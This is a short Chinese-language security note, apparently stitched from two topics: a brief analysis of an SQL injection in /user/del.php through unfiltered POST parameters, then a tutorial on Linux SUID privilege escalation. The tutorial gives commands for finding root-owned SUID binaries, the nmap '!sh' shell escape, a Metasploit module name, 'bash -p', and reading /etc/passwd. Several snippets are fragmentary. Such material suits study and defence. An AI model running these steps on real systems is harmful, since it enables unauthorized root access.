0x01 漏洞分析
本次漏洞发生在/user/del.php中,首先,这里的pagename和tablename可以看到都是通过POST方法传进来的,但是只是用trim函数简单的处理了一下,之后也没有任何过滤的手段了,因此是一个比较简单的sql注入了。
什么是suid?通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。
那么什么是suid提权呢?我理解的就是有个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,不然没什么用处,那么我们就能从普通用户提升到了root权限了。
1 | Nmap |
1 | find / -user root -perm -4000 -print 2>/dev/null |
1 | nmap> !sh |
msf中也有相关的模块
1 | exploit/unix/local/setuid_nmap |
如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。
1 | touch test |
如果vim以SUID运行,就会继承root用户的权限,可以读取系统中所有的文件
1 | vim/vi |
1 | bash -p |
1 | less /etc/passwd |